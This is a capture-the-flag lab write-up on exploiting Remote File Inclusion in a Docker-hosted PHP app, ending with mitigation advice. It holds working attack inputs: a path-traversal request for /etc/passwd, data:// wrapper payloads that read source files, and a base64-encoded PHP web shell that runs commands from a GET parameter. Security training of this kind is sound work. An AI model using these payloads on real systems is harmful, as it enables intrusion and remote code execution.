Remote File Inclusion (RFI) Lab — Docker Custom Setup and Exploitation

🧨 Vulnerability:

• Remote File Inclusion (RFI) via unsanitized file parameter.

⚠️ Risk Assessment:

• Risk Level: Critical
• Impact: Remote code execution, data exposure
• Likelihood: High

🛠️ Lab Setup: RFI Vulnerability with Docker

Prerequisites:

Ensure Docker is installed in your Kali machine:

sudo apt install docker.io

Clone the Lab Repository:

git clone https://github.com/moeinfatehi/rfi_vulnerability_scenarios.git
cd rfi_vulnerability_scenarios
sudo docker-compose up --build

Once the build is complete, access the lab via the local Docker IP (e.g., http://172.18.0.2).

✅ To stop Docker:

sudo docker stop $(docker ps -a -q)

🔍 Approaches to Solve the RFI Labs

The lab includes two vulnerable pages:

• rfi1
• rfi2

This write-up focuses on rfi1.

🌐 RFI1 Analysis

The page at http://172.18.0.2/rfi1/ presents a form with two buttons:

• Submit
• Include File (uses ?file=flag.php)

The source code hints that a flag exists inside flag.php, but accessing it directly is restricted.

🧪 Attempted LFI (Local File Inclusion)

Tried classic LFI payload:

http://172.18.0.2/rfi1/?file=../../../../../../etc/passwd

🚫 Output:

“Forget LFI, try RFI!”

This suggests Remote File Inclusion is intended.

🌐 Remote File Inclusion Attempt

Tried loading an external resource:

http://172.18.0.2/rfi1/?file=https://google.com

✅ Google loaded, confirming RFI is functional.

💡 Using PHP Wrappers (data://)

To exploit RFI without external hosting, I used PHP’s data:// wrapper to inject base64-encoded payloads directly.

References:

• 📚 Understanding PHP Wrappers
• 🐦‍🔥File inclusion at master

Payloads Used:

# Base64 encode and read local PHP file (e.g., index.php)
http://172.18.0.2/rfi1/?file=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>

# Execute system command via GET parameter (basic web shell)
http://172.18.0.2/rfi1/?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

✅ Decoded Result: Flag was printed in base64 format.
🧠 Decoded the flag using:

echo 'BASE64_STRING' | base64 -d

🎉 Flag successfully retrieved!

http://target/rfi1/?file=data://text/plain,<?php echo base64_encode(file_get_contents("flag.php")); ?>

🛡️ Recommended Mitigations:

• Disable allow_url_include and allow_url_fopen in php.ini
• Sanitize and validate all user inputs
• Implement strict allowlists for file inclusion
• Use secure coding patterns for dynamic file loading

✅ Conclusion

This lab demonstrated a practical scenario of Remote File Inclusion (RFI) using PHP’s data:// wrapper to access local resources and execute arbitrary code. It highlighted:

• Secure lab setup via Docker
• Identification and exploitation of RFI
• Use of base64 encoding for stealth payload delivery.

Any query leave a comment. Thank you..